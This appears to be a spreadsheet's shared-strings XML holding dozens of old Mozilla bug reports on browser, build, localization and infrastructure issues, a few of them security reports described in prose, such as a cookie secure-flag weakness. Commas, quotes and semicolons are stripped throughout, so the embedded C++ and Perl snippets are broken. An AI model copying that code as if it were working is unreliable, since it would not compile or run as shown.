  <si>
    <t>Add SINGLE_LINE state to single line text inputbox</t>
  </si>
  <si>
    <t>The single line text inputbox should have SINGLE_LINE state which is an extened
state.</t>
  </si>
  <si>
    <t>CORE-485834</t>
  </si>
  <si>
    <t>ObserverService shouldn't recurse infinitely for stupid consumers</t>
  </si>
  <si>
    <t>Created attachment 369926
protect against stupidity
So bug 325392 shows an example of a stupid consumer.
NS_IMPL_ISUPPORTS1(nsBroken nsIObserver)
nsBroken::nsBroken() {
  nsCOMPtr
    os(do_GetService(@mozilla.org/observer-service1))
  os-&gt;AddObserver(this stupid PR_FALSE)
}
nsBroken::~nsBroken() {
  nsCOMPtr
    os(do_GetService(@mozilla.org/observer-service1))
  os-&gt;RemoveObserver(this stupid)
}
NS_IMETHODIMP
nsBroken::Observe(
  nsISupports*     subject
  const char*      topic
  const PRUnichar* data_unicode)
{
  return NS_OK
}</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-499709</t>
  </si>
  <si>
    <t>Release Engineering</t>
  </si>
  <si>
    <t>Setup GPG signing infrasctucture</t>
  </si>
  <si>
    <t>We've got the hardware working all that's left is to create the final signing keys get them published and test the existing signing automation will work.</t>
  </si>
  <si>
    <t>SOCORRO-458798</t>
  </si>
  <si>
    <t>Redesign and implement Socorro's file system storage</t>
  </si>
  <si>
    <t>Socorro's file system storage has flaws:  
* if monitor is offline for a while the filesystem can be overwhelmed with new entries - make the file system storage tolerant of an outage of monitor
* the current system requires periodic cleanup by deleting old unused directories - make a system that is self cleaning
* the file system code is not modular it's tied closely to collector - make a modular set of routines or a class that can be used in a uniform manner by multiple scripts
* the standard and deferred storage schemes are not parallel.  They use different code and different layouts - these should be unified</t>
  </si>
  <si>
    <t>FIREFOX-329961</t>
  </si>
  <si>
    <t>Add tag root folder to Places</t>
  </si>
  <si>
    <t>Tags in places will be implemented as a non-hierarchical set of folders within a top-level Tags folder.  We need to establish the ID for that root and make sure it gets established during setup.</t>
  </si>
  <si>
    <t>CORE-408514</t>
  </si>
  <si>
    <t>nsFileOutputStream asserts when tested with NS_OutputStreamIsBuffered</t>
  </si>
  <si>
    <t>WriteSegments asserts. Can this be a warning?</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-456160</t>
  </si>
  <si>
    <t>tinderbox.mozilla.org is mostly down</t>
  </si>
  <si>
    <t>tinderbox.mozilla.org is mostly down right now:
http://tinderbox.mozilla.org/showbuilds.cgi?tree=Firefox&amp;hours=3 gives a 500 internal server error or just hangs while trying to load
http://tinderbox.mozilla.org/Firefox/ shows a static page that hasn't been updated for over 20 minutes (which seems likely to be around when the problems started)
This blocks people from pushing to hg.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-312208</t>
  </si>
  <si>
    <t>Widget: Mac</t>
  </si>
  <si>
    <t>Carbon menu code cleanup</t>
  </si>
  <si>
    <t>When I was writing the Cocoa menus I found a bunch of Carbon menu code that can
be cleaned up. Even though we're not going to use it for much longer it'll
probably be a reference for some time to come. This bug is for landing some of
the cleanup that can be done.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-396179</t>
  </si>
  <si>
    <t>Cannot insert elements from xforms namespace using origin attribute on insert element</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6
Build Identifier: 0.8.0.3
Discovered the bug when trying to develop an xform (main form) to edit another xform (instance form).  
I have a repeat element in the main form that lists the existing model elements and controls in the instance form.  I have created an instance of xform model and control elements to use as templates (controls instance).  Using the xforms insert element with the origin attribute bound to a node in the controls instance I should be able to insert a new xforms model or control element. 
Problem 1: With an xforms:instance element in the controls instance the main form will not load.  The xforms extension appears to be trying to load the xform:instance element even though it is only supposed to be an xml template.  It also tries to load the xforms:instance elements in the instance form.
Problem 2: Taking out the xforms:instance elements in both the form and the controls instances or associating them with a different namespace the form will load. Clicking on the trigger to execute the insert action to insert a control (e.g. input) from the controls instance has no effect.  Tested in Orbeon xforms sandbox it does properly insert the control from the controls instance so it appears that the code is correct.
Reproducible: Always
Steps to Reproduce:
1. Create a simple xform
2. Create another xform that loads the first xform as an instance and has a repeat to list the controls in the instance xform
3. Create a another instance with a few xforms controls to be used as templates.
4. Add a trigger to the main form to insert an xform control from the controls instance into the xform instance (using origin bound to a node in the controls instance)
5. load the form and click on the trigger.  Nothing will happen. 
Actual Results:  
Clicking a trigger to insert and xforms control from a template instance into a form instance should insert the control.  
Expected Results:  
The insert action fails.</t>
  </si>
  <si>
    <t>msterlin</t>
  </si>
  <si>
    <t>fraserhore</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-186042</t>
  </si>
  <si>
    <t>something with pop blocker crashes browser</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.1) Gecko/20021104 Chimera/0.6
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X en-US rv:1.0.1) Gecko/20021104 Chimera/0.6
Going to subject link from my.yahoo.com News from MacCentral causes a crash.
 I have pop up block enabled I think it is the pop up that causes the crash. 
Going directly to the page does not crash it.   
Mozilla 1.3a does not exhibit this problem.
Reproducible: Always
Steps to Reproduce:
1.  go to my yahoo with MacCentral news channel enabled on your my yahoo page
2.  click on connectix unviels virtual PC 6.0
3.  watch the page pull and then browser crashes an instant later
Actual Results:  
navigator unexpectedly quits
Expected Results:  
show the page as if it was addressed directly</t>
  </si>
  <si>
    <t>saari</t>
  </si>
  <si>
    <t>lindell</t>
  </si>
  <si>
    <t>CORE-11011</t>
  </si>
  <si>
    <t>Need pseudo-classes for when alt text is shown (:-moz-alt-text :-moz-placeholder :-moz-broken)</t>
  </si>
  <si>
    <t>The boxes for ALT text (or file basename) from an  with broken URI
is not layed out properly they are overlapping.
build id: 1999072908 on Windows 98
Will create attachment with testcase...
Note: clicking the box will not work either but that has been
reported in bug#5349</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-450583</t>
  </si>
  <si>
    <t>bg / Bulgarian</t>
  </si>
  <si>
    <t>[bg] Firefox 3 RSS reader setup for Bulgarian</t>
  </si>
  <si>
    <t>This is a follow up to bug 424687.
RSS readers are web services allowing users to subscribe to RSS feeds online and view them. If Firefox detects a feed it offers the user to subscribe to it either as a live bookmark or via one of the web services.
The current RSS Readers in en-US are Bloglines My Yahoo Google.
We want to ship a good set of defaults for Bulgarian and will work towards that in three stages.
First the localization team and Mic (Michal Berman) will look at the market for the language and come up with a good candidates. Ogi we'll need your input on this the guidelines for making recommendations are on http://wiki.mozilla.org/Firefox_web_services_guidelines. After we decided on a particular RSS reader Mic will contact the owner and ask for permission. undefined we'll likely need your help to at least get the contact information.
Once we have a specification on what the set of RSS readers for Bulgarian should look like the localization team and Axel will work on an implementation on that. This should happen by the localization team creating and attaching patches for the desired changes and requesting review from Axel. After a successful review the localization team will land them. If you're not feeling comfortable with creating those changes ask Axel to help out.
Please don't commit any modifications in l10n/bg/browser/chrome/browser-region/region.properties to the cvs repository without a patch reviewed by Axel or someone else appointed by Mic. The data here is sensitive to users and our search partners thus the extra care here.
Bug 424687 comment 4 mentions replacing bloglines with netvibes. We'll need a patch for that that's not blocking beta though.</t>
  </si>
  <si>
    <t>TESTOPIA-371957</t>
  </si>
  <si>
    <t>Test Runs</t>
  </si>
  <si>
    <t>when clicking on the magnifying glass for notes in a test run the context of the screen resets to the top</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: testopia 1.1.3
When clicking on the magnifying glass for notes in a test run the context of the screen resets to the top. That is the run screen goes to the top of the page immediately when clicking on the magnifying glass. The notes page pops up at the same time. (normal) It would be a bit nicer if on the run page you stayed at the location of the test case from which you hit the magnifying glass button. 
Reproducible: Always
Steps to Reproduce:
1. Go to runs.
2. expand a case
3. click on magnifying glass
Actual Results:  
1. new notes window pops up.
2. run page resets to the top
Expected Results:  
1. new notes window pops up.
2. run page stays at the test case from which you cliced on the magnifying glass</t>
  </si>
  <si>
    <t>keith.mcfall</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-290202</t>
  </si>
  <si>
    <t>Developer Pages</t>
  </si>
  <si>
    <t>Unable to leave Developers and come back in</t>
  </si>
  <si>
    <t>Redirection limit for this URL exceeded. Unable to load the requested page. This
may be caused by cookies that are blocked.
Go to /developers
Log in
Click Firefox: Extensions at the top
Click Developers link at the top
Page fails to load</t>
  </si>
  <si>
    <t>SEAMONKEY-217342</t>
  </si>
  <si>
    <t>Tabbed Browser</t>
  </si>
  <si>
    <t>change close tab message</t>
  </si>
  <si>
    <t>I just want to change the message a bit</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-326118</t>
  </si>
  <si>
    <t>create a build@mozilla-org.bugs user and set initial members</t>
  </si>
  <si>
    <t>We need a build@mozilla-org.bugs user that points to initial members of:
  chase@mozilla.org
  preed@mozilla.com
  ccooper@deadsquid.com
  dbaron@dbaron.org
This user should also be the default assignee for bugs filed in the m.o/Build &amp; Release component.  Thanks.</t>
  </si>
  <si>
    <t>CORE-323781</t>
  </si>
  <si>
    <t>Prints still go to printer even after it is deleted</t>
  </si>
  <si>
    <t>Tested using Firefox 1.6a1 BuildID20060116 SeaMonkey 1.1a BuildID 20060111 and Mozilla 1.8b2 BuildID 20050521
Steps to reproduce
1. Map two printers (Printer A and Printer B) to printer shares on another PC and make one of them the default (say Printer A)
2. Print a web page to the non-default printer (Printer B) using either print button or file and print.
3. Delete non-default printer (Printer B) via Control Panel Printers.
4. Select file and print or click on print button to print the web page again this time Printer A shows as printer to be printed to (do not click on the drop down at all).
5. Click on OK button to print.
Actual result
1. Both prints come off on the Printer B.
Expected result
1. First print should come off on Printer B and second should come off on Printer A.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-362209</t>
  </si>
  <si>
    <t>test -e not available in sh</t>
  </si>
  <si>
    <t>After the landing of patch for bug 360125 the Solaris build is broken in the configure process:
./configure: test: argument expected
The root cause is on the usage of test -e:
http://lxr.mozilla.org/seamonkey/source/configure.in#4883</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-143164</t>
  </si>
  <si>
    <t>Doctor</t>
  </si>
  <si>
    <t>doctor should handle URLs and URL paths better</t>
  </si>
  <si>
    <t>Doctor should handle URLs from multiple sites (http://www.mozilla.org/ and
http://mozilla.org/) and allow people to enter a URL path (f.e.
/xpfe/index.html) to a file.</t>
  </si>
  <si>
    <t>CORE-52420</t>
  </si>
  <si>
    <t>[ps]RFE: Multiple font setting for CJK PS printing</t>
  </si>
  <si>
    <t>Currently we can specify only one font for CJK PostScript printing.
In Japanese locale Ryumin-Light will be used for all japanese
characters which is defined in print.psnativefont.ja in unix.js.
However as various Latin fonts are used for ascii characters
it would be better to provide more setting for CJK fonts.
For examples it is better we use GothicBBB-Medium for Helvetica
Ryumin-Light for Times. 
print.psnativefont..ja=
print.psnativefont.Helvetica.ja=GothicBBB-Medium-EUC-H
print.psnativefont.Times.ja=Ryumin-Light-EUC-H</t>
  </si>
  <si>
    <t>masaki.katakai</t>
  </si>
  <si>
    <t>CORE-479413</t>
  </si>
  <si>
    <t>SSL spoofing using IDN characters that appear like spaces on Windows (invisible)</t>
  </si>
  <si>
    <t>All important is described on URL: http://tinyurl.com/am8gjy</t>
  </si>
  <si>
    <t>NSS-336982</t>
  </si>
  <si>
    <t>Useless null check of ss in ssl3_config_match_init</t>
  </si>
  <si>
    <t>FIREFOX-425611</t>
  </si>
  <si>
    <t>Item annotations don't support EXPIRE_WITH_HISTORY</t>
  </si>
  <si>
    <t>And the docs in devmo and in the idl itself don't make it clear that you can't use it for setItemAnnotation.
We should a) document that it doesn't work and b) have an EXPIRE_WITH_ITEM to match.  The closest thing I see is EXPIRE_NEVER but the idl clearly states that it will then live in the db forever.  Or is that not true in the case of items?
As a related problem the idl also doesn't mention that from JS I don't need to worry about nsIVariants.  I know everything gets magically marshalled now but since I was getting NS_ERROR_ILLEGAL_VALUE I spent a while trying to create nsIVariants to pass in.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-379049</t>
  </si>
  <si>
    <t>AllPeers 0.56.1 stubs need swapping out</t>
  </si>
  <si>
    <t>Okay we found a Linux issue with 0.56 so we've made a fix that should also solve the version numbering issue in one fell swoop. XPIs are at:
http://www.allpeers.com/download/amo/0.56.1/allpeers_beta-0.56.1-fx-linux.xpi
http://www.allpeers.com/download/amo/0.56.1/allpeers_beta-0.56.1-fx-macosx.xpi
http://www.allpeers.com/download/amo/0.56.1/allpeers_beta-0.56.1-fx-windows.xpi
Extension ID: allpeers@allpeers.com
AMO page: https://addons.mozilla.org/en-US/firefox/addon/3234
Sorry again if this process has been more painful than it needed to be.</t>
  </si>
  <si>
    <t>matthew.gertner</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-296303</t>
  </si>
  <si>
    <t>Provide simple archive file format for update service</t>
  </si>
  <si>
    <t>Provide simple archive file format for update service
Given that bsdiff is designed to compress really well with bzip2 it is not
ideal to use ZIP as the archive format for the update service.  I choose to
write a very simple archive format that is basically a concatenation of all of
the bzip2 compressed files with an index table tacked on to the end.  The
archive format itself does not know about compression.  The amount of code
required to read the archive format is very small so it helps minimize the
codesize of the standalone updater executable.
I've included code for a command line utility that makes it easy to perform the
usual operations: create extract and test.
This code is known to work on Linux Windows and Mac OSX.</t>
  </si>
  <si>
    <t>CORE-128561</t>
  </si>
  <si>
    <t>Images print in low quality</t>
  </si>
  <si>
    <t>[Regression from bug 127430 (throw away nsImageGTK client side copy]
We now print images in a far lower quality when the browser is displaying on a
non-TrueColor Xserver because we now use a copy from the (dithered) Xserver
images instead using the our own 24bit RGB data.
Steps to reproduce:
1. Start Mozilla on a Xserver which has only 8bit (or lower) visuals
2. Print a page (PostScript module)
Result:
Ugly dithered images sometimes with wrong colors - even on high-quality
printers. On StaticGray visuals the images end-up as grayscale images with color
text.
Expected result:
High-quality printout</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-210158</t>
  </si>
  <si>
    <t>transparent PDF documents don't show in Camino</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5a) Gecko/20030617 Camino/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.5a) Gecko/20030617 Camino/0.7+
Transparent PDF documents embedded into web sites don't show in Camino.
Reproducible: Always
Steps to Reproduce:
1. Install PDF Browser Plugin 1.2 (previous versions didn't support transparency)
2. go to 
3. scroll down to the two embedded PDF smileys
Actual Results:  
the transparent smiley on the right side isn't visible
Expected Results:  
the transparent smiley should be visible</t>
  </si>
  <si>
    <t>peterlubczynski-bugs</t>
  </si>
  <si>
    <t>manfred</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-396805</t>
  </si>
  <si>
    <t>fxdbug-linux-tbox needs to be upgraded to the new ref platform</t>
  </si>
  <si>
    <t>Looks like this version requirement change broke fxdbug-linux-tbox which is still the older CentOS 4.4 ref platform.
This bug tracks upgrading it to the new CentOS 5 ref platform.</t>
  </si>
  <si>
    <t>mozpreed</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-429040</t>
  </si>
  <si>
    <t>have talos deal with crash reporters per platform</t>
  </si>
  <si>
    <t>Talos can sometimes gets stuck on the mac crashreporter process or the windows dwwin.exe process.  The issue seems to be that they are owned by root so talos can't cleanly kill them.
We either need to determine how to disable these reporters or manager to terminate them by the end of a talos run.</t>
  </si>
  <si>
    <t>CORE-518925</t>
  </si>
  <si>
    <t>LirWriter leak with regexp match in debug builds</t>
  </si>
  <si>
    <t>valgrind --dsymutil=yes --smc-check=all --leak-check=full ~/tracemonkey/js/src/debug/js -j
.match(/.*x/)
causes:
8 bytes in 1 blocks are definitely lost in loss record 12 of 225
   at 0x28F0D8: calloc (vg_replace_malloc.c:418)
   by 0xF4ECC: nanojit::LirWriter::operator new(unsigned long) (LIR.h:1019)
   by 0xFA85A: RegExpNativeCompiler::compile() (jsregexp.cpp:3154)
   by 0xF3A59: CompileRegExpToNative(JSContext* JSRegExp* nanojit::Fragment*) (jsregexp.cpp:3253)
   by 0xF3C53: GetNativeRegExp(JSContext* JSRegExp*) (jsregexp.cpp:3276)
   by 0xF3CE0: MatchRegExp(REGlobalData* REMatchState*) (jsregexp.cpp:4682)
   by 0xF4109: js_ExecuteRegExp (jsregexp.cpp:4866)
   by 0x10B3A1: DoMatch(JSContext* long* JSString* RegExpGuard const&amp; bool (*)(JSContext* unsigned long void*) void* MatchControlFlags) (jsstr.cpp:1458)
   by 0x110AD3: str_match(JSContext* unsigned int long*) (jsstr.cpp:1537)
   by 0x87589: js_Interpret (jsops.cpp:2235)
   by 0x9971A: js_Execute (jsinterp.cpp:1599)
   by 0x1EB6B: JS_ExecuteScript (jsapi.cpp:4947)
Tested with valgrind rev 10894 and TM rev 6fef8dd5dba6+.
This affects some tests in python trace-test.py --valgrind-all (e.g. check-date-format-xparb.js). It also affects jsfunfuzz.
This seems to only happen in debug builds so maybe it's related to the sanity_filter stuff in RegExpNativeCompiler::compile which was added in rev f461c8c654e7 for bug 514548.</t>
  </si>
  <si>
    <t>BUGZILLA-124174</t>
  </si>
  <si>
    <t>Email Notifications</t>
  </si>
  <si>
    <t>processmail should be a package</t>
  </si>
  <si>
    <t>It would be good if globals.pl defined a sub CallProcessMail which contained 
the system() call so that all the separate files could just call that single 
sub. In a Win32 installation it's many times necessary to whip up several 
parameters to the system call and it's rather cumbersome to run around the 
source files pasting the new code everywhere. Combining the calls into a single 
place would help changing the system call syntax.
I currently use the following: 
sub CallProcessMail {
 system(d:\\perl\\bin\\perl.exe -I\\\\t1\\\\s1\\bugzilla\\ \\\\t1\\\\s1
\\bugzilla\\processmail.pl @_)
}</t>
  </si>
  <si>
    <t>jouni</t>
  </si>
  <si>
    <t>CALENDAR-315930</t>
  </si>
  <si>
    <t>Publish Entire Calendar does not export tasks</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.9a1) Gecko/20051110 Mozilla Sunbird/0.3a1+
Publish Entire Calendar does not export tasks only events.
Steps to Reproduce:
- create new calendar
- create one event
- create one task
- select Publish Entire Calendar for calendar and export to a local *.ics file
- open *.ics file in text editor
Actual Results:
- there is only one VEVENT element in *.ics file
Expected Results:
- one VEVENT and one VTODO element should be in *.ics file</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-242189</t>
  </si>
  <si>
    <t>Get branding working on OS/2 Firefox</t>
  </si>
  <si>
    <t>Build changes to get branding working.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-142829</t>
  </si>
  <si>
    <t>allow users to create files</t>
  </si>
  <si>
    <t>Doctor should let users create files in addition to editing them.</t>
  </si>
  <si>
    <t>CORE-406686</t>
  </si>
  <si>
    <t>I can still steal your bank login (spoofing using  take 2)</t>
  </si>
  <si>
    <t>Created attachment 291347
script for following testcase
Bug 326877 comment 82 (open a new tab and show a popup in front of it from a different tab) still works just fine for me on trunk.  I can still swipe your login info just fine with the URL bar showing your bank's domain.  Simplified testcase in a moment.</t>
  </si>
  <si>
    <t>csthomas</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-228574</t>
  </si>
  <si>
    <t>ryder.com - doesn't render well</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6b) Gecko/20031214 Camino/0.7+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.6b) Gecko/20031214 Camino/0.7+
the page renders poorly. i suspect bad html...but wanted to report it in case it
is a real problem.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>CORE-524231</t>
  </si>
  <si>
    <t>NJ merge: catch lirasm up with recent changes</t>
  </si>
  <si>
    <t>Created attachment 408140
lirasm patch
NPOTB on the TM side this just catches up with things we've been reconciling lately.</t>
  </si>
  <si>
    <t>FIREFOX_GRAVEYARD-299649</t>
  </si>
  <si>
    <t>Document switching to previous search engine using keyboard</t>
  </si>
  <si>
    <t>We already document selecting the next one -- it's the last shortcut on the page
in trunk code.  We don't document selecting the previous one however.
The trivial patch is coming...</t>
  </si>
  <si>
    <t>jwalden+fxhelp</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-495231</t>
  </si>
  <si>
    <t>[silme] allow using full JAR uri (including local path) to limit get_package in silme.io.jar</t>
  </si>
  <si>
    <t>The current bahavior here http://hg.mozilla.org/users/zbraniecki_mozilla.com/silme/file/4aa68586ff68/lib/silme/io/jar.py#l66 is that we send just the relative path to should_ignore. For what I'm doing in compare-locales2 I need the full path to filter properly.
There are two ways of fixing this:
1) Sending as path the full path. It'd be still possible to get the relative path in an own ignore-method.
2) Sending the full path as an additional element in elems.
Just do discussion: does it make sense to send two arguments: filename dirname in elems instead of just name?</t>
  </si>
  <si>
    <t>akalla</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-474783</t>
  </si>
  <si>
    <t>Create l10n bugzilla component for Sri Lankan Tamil (ta-LK)</t>
  </si>
  <si>
    <t>We need a bugzilla component for the ta-LK Localization.
Product: Mozilla Localizations
Component: ta-LK / Sri Lankan Tamil
Description: Sri Lankan Tamil Localization (...)
Assignee: nobody
QA Contact: ta-LK@localization.bugs
Sarves could you provide a utf-8 encoded translation of 'Sri Lankan Tamil Localization' to include in the component description?</t>
  </si>
  <si>
    <t>SEAMONKEY-13663</t>
  </si>
  <si>
    <t>change apprunner to mozilla</t>
  </si>
  <si>
    <t>Need to change final linked application name from apprunner to mozilla. A
similar change needs to be made in the commercial tree.</t>
  </si>
  <si>
    <t>Chris.Yeh</t>
  </si>
  <si>
    <t>BUGZILLA-367649</t>
  </si>
  <si>
    <t>Attachments &amp; Requests</t>
  </si>
  <si>
    <t>Deleting an attachment should set isobsolete to 1</t>
  </si>
  <si>
    <t>As obviously a deleted attachment is obsolete. This also ensures the attachment will be striked out + you can easily hide it.</t>
  </si>
  <si>
    <t>bugzilla-mozilla</t>
  </si>
  <si>
    <t>FIREFOX-291106</t>
  </si>
  <si>
    <t>installer bails with garbage dialog if installing the last component had an error</t>
  </si>
  <si>
    <t>If the last component installed has an error nsXIEngine::Install will return
E_INSTALL.  nsInstallDlg::PerformInstall does XI_ERR_BAIL which calls
ErrorHandler(E_INSTALL) but ErrorHandler expects a second argument with
E_INSTALL.  |msg| is used uninitialized resulting in a garbage dialog.</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-454117</t>
  </si>
  <si>
    <t>WinMobile / WinCE has no Access Control Levels (ACL)</t>
  </si>
  <si>
    <t>Created attachment 337365
Stubs out ACLAPI include and use for file access control level setting
Need to remove access control level code from WinCE builds since WinCE has no idea of Access Control Levels (Windows Desktop concept).
Attachment stubs out ACLAPI include and use within xpcom/io/nsLocalFileWin.cpp</t>
  </si>
  <si>
    <t>CORE-477708</t>
  </si>
  <si>
    <t>expose nsIRegion::getRects() to scripts</t>
  </si>
  <si>
    <t>Created attachment 361393
stuff</t>
  </si>
  <si>
    <t>taras.mozilla</t>
  </si>
  <si>
    <t>CORE-262964</t>
  </si>
  <si>
    <t>nsRange::InsertNode fails because of nsGenericDOMDataNode::SplitText</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a4) Gecko/20040927
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a4) Gecko/20040927
SplitText calls CloneContent.
CloneContent implementation has been changed (see bug 27382)
Reproducible: Always
Steps to Reproduce:
In an app embedding Gecko:
#include nsIDOMDocument.h
#include nsIDOMDocumentRange.h
#include nsIDOMElement.h
#include nsIDOMRange.h
#include nsIDOMNode.h
#include nsIDOMText.h
#include nsISelection.h
#include nsIDOMWindow.h
nsresult rv
nsIDOMDocument* domDoc
mWebNav-&gt;GetDocument(
//
nsCOMPtr domElement
domDoc-&gt;CreateElement(NS_LITERAL_STRING(b) getter_AddRefs(domElement))
nsCOMPtr domText
domDoc-&gt;CreateTextNode(NS_LITERAL_STRING(insert me) getter_AddRefs(domText))
//
nsCOMPtr domWindow
mWebBrowser-&gt;GetContentDOMWindow(getter_AddRefs(domWindow))
nsCOMPtr selection
domWindow-&gt;GetSelection(getter_AddRefs(selection))
//
nsCOMPtr domRange
PRInt32 c
selection-&gt;GetRangeCount(
selection-&gt;GetRangeAt(0 getter_AddRefs(domRange))
//
domRange-&gt;InsertNode(domElement)
nsCOMPtr dummyNode
domElement-&gt;AppendChild(domText getter_AddRefs(dummyNode))
Actual Results:  
InsertNode calls nsGenericDOMDataNode::SplitText that fails on
nsGenericDOMDataNode::CloneContent.</t>
  </si>
  <si>
    <t>traversal-range</t>
  </si>
  <si>
    <t>atremon</t>
  </si>
  <si>
    <t>CORE-350906</t>
  </si>
  <si>
    <t>celliterator assert with empty table</t>
  </si>
  <si>
    <t>SEAMONKEY-173262</t>
  </si>
  <si>
    <t>GRE enable the Mozilla client..</t>
  </si>
  <si>
    <t>We need to  GRE enable the Mozilla client on all the platforms. Currently the
only client which uses the GRE functionality is the MfcEmbed test harness on
the Windows platform.
All the core XPCOM related changes for the GRE are already on the current
Mozilla trunk.
More info. on the GRE at : http://www.mozilla.org/projects/embedding/MRE.html</t>
  </si>
  <si>
    <t>chak</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-449974</t>
  </si>
  <si>
    <t>AMO cookies don't specify secure connections potentially hackable</t>
  </si>
  <si>
    <t>Mike Perry gave a talk at Defcon 16 about using spoofed http (insecure) connections to steal auth cookies from normally-secure sites. Even if a site is only available over SSL and redirects any plain HTTP connection attempts if the cookies themselves don't contain the secure flag a victim who forgets to specify http_s_ could be hijacked to a fake AMO site that steals their cookies. This is probably pretty common with people entering just addons.mozilla.org out of natural laziness and letting browser magic supply http:// and then redirect to https://.
Mike sent the following to security@mozilla.org:
  I'm doing a presentation on grabbing insecure https cookies at Defcon:
  http://www.defcon.org/html/defcon-16/dc-16-speakers.html#Perry
  http://seclists.org/bugtraq/2007/Aug/0070.html
  The majority of the details of the issue are in that bugtraq link.
  I've noticed that the cookies on addons.mozilla.org ... are
  not marked for encrypted sessions only. This
  means that these cookies can be hijacked by attackers on the local
  network via Dan Kaminsky's DNS poisoning attack or via injection
  onto a cable modem network (a cable modem packet injection technique
  was also presented at this DEFCON).
  This is particularly dangerous ... where some extension developers
  are given 'trusted' status. An attacker can
  target one of these users and push out a malicious Firefox extension
  to tens or even hunderds of thousands of users before being noticed.</t>
  </si>
  <si>
    <t>dveditz</t>
  </si>
  <si>
    <t>CORE-282281</t>
  </si>
  <si>
    <t>should nsIDOMCSS2Properties.idl and nsIDOMElementCSSInlineStyle.idl be frozen?</t>
  </si>
  <si>
    <t>those two interfaces come from DOM2 Style
(http://www.w3.org/TR/DOM-Level-2-Style/css.html#CSS-ElementCSSInlineStyle)
which is a W3C REC.
so shouldn't the interfaces be marked @status FROZEN in the moz code?
http://lxr.mozilla.org/seamonkey/source/dom/public/idl/css/nsIDOMElementCSSInlineStyle.idl
http://lxr.mozilla.org/seamonkey/source/dom/public/idl/css/nsIDOMCSS2Properties.idl</t>
  </si>
  <si>
    <t>CORE-2798</t>
  </si>
  <si>
    <t>warnings: hiding inherited virtual functions</t>
  </si>
  <si>
    <t>Split out into a separate bug. See original bug #2715 for more details.
Warning : 'nsContainerFrame::RemoveFrame(nsIFrame *)' hides inherited virtual
function 'nsFrame::RemoveFrame(nsIPresContext &amp; nsIPresShell &amp; nsIAtom *
nsIFrame *)'
nsContainerFrame.h line 152   }
Warning : 'nsContainerFrame::RemoveFrame(nsIFrame *)' hides inherited virtual
function 'nsIFrame::RemoveFrame(nsIPresContext &amp; nsIPresShell &amp; nsIAtom *
nsIFrame *)'
nsContainerFrame.h line 152   }</t>
  </si>
  <si>
    <t>buster</t>
  </si>
  <si>
    <t>troy</t>
  </si>
  <si>
    <t>OTHER_APPLICATIONS-372874</t>
  </si>
  <si>
    <t>Clicking on URL with a @ in it opens MailNews Compose (or default mail handler?)</t>
  </si>
  <si>
    <t>To reproduce:
1. Fetch a CZ trunk build
2. Send the URL http://www.google.com/groups?selm=mailman.1.1173201459.31338.dev-planning@lists.mozilla.org as message to a channel
3. Click on that URL
Results:
In SeaMonkey a MailNews Compose window opens and http://www.google.com/groups is inserted as To: address.</t>
  </si>
  <si>
    <t>CORE-437170</t>
  </si>
  <si>
    <t>ASSERTION: non-element leaked into SelectorMatches matching node inside document fragment</t>
  </si>
  <si>
    <t>Created attachment 323653
testcase
Mozilla/5.0 (Macintosh U Intel Mac OS X 10.5 en-US rv:1.9.1a1pre) Gecko/2008053019 Minefield/3.1a1pre
###!!! ASSERTION: non-element leaked into SelectorMatches: '!aContent || aContent-&gt;IsNodeOfType(nsINode::eELEMENT)' file /Users/jruderman/central/layout/style/nsCSSRuleProcessor.cpp line 810</t>
  </si>
  <si>
    <t>TOOLKIT-259414</t>
  </si>
  <si>
    <t>Find Toolbar</t>
  </si>
  <si>
    <t>Reached end of page [. . .] icon disapearing but text stays</t>
  </si>
  <si>
    <t>Open the find toolbar.  Search for a string and hit Find Next/Previous until you
are presented with the Reached end/top of page continued from top/bottom. 
Close the find toolbar.  Open the find toolbar.  Notice that the Reached
end/top of page continued from top/bottom icon is no longer displayed but the
Reached end/top of page continued from top/bottom text is.
I believe the text's presence is the error (rather than the icon's absence).</t>
  </si>
